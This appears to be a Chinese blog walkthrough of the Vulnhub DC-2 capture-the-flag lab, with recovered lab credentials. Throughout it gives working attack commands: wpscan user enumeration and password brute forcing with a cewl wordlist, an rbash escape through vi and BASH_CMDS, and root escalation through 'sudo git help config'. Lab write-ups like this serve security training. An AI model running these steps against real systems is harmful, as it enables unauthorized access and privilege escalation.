Vulnhub靶场----2、DC-2


一、环境搭建

DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip
kali:192.168.144.148
DC-2:192.168.144.150
添加hosts文件:192.168.144.150 DC-2

在这里插入图片描述
在这里插入图片描述


二、渗透流程

nmap -A -T5 -sV -sT -p- 192.168.144.150
开放端口:80(web)、 7744(ssh)

在这里插入图片描述

访问:192.168.144.150,web页面获取到flag1

在这里插入图片描述
在这里插入图片描述

flag1提示使用cewl工具进行暴力破解
进行目录扫描,获取到后台登录地址:http://dc-2/wp-admin
使用wpscan对wordpress用户进行枚举:wpscan --url http://dc-2 -e u
获取到三个用户:admin、jerry、tom

在这里插入图片描述

利用cewl工具生成密码字典:cewl http://dc-2 -w passwd.txt

在这里插入图片描述

生成用户字典:vim user1.txt

在这里插入图片描述

使用wpscan进行爆破:wpscan --url http://dc-2 -U user1.txt -P passwd.txt

在这里插入图片描述

获取到了jerry:adipiscingtom: parturient,登录后台,获取到flag2

在这里插入图片描述
在这里插入图片描述

flag2提示,如果此路不通,尝试另一种方法,尝试7744端口ssh连接
tom登录成功

在这里插入图片描述

执行ls命令,发现flag3

在这里插入图片描述

rbash限制,cat无法执行,vim无法执行,vi可以执行

在这里插入图片描述
在这里插入图片描述

flag3提示可以尝试切换一下用户
使用vi突破rbash
vi
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
su jerry
成功切换到jerry

在这里插入图片描述

成功访问到flag4

在这里插入图片描述

查看是否有可以提权的命令:find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

sudo -l:发现git可以利用,flag4也提示了可以使用git

在这里插入图片描述

sudo git help config:进入文本模式
!/bin/bash:获取shell

在这里插入图片描述

获取最后的final-flag.txt

在这里插入图片描述


三、思路总结

1、nmap端口扫描,添加hosts文件,访问web页面;
2、dirb目录扫描获取后台登录地址;
3、cewl暴力破解获取后台登录账户;
4、ssh远程连接;
5、vi突破rbash切换用户;
6、git提权;

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值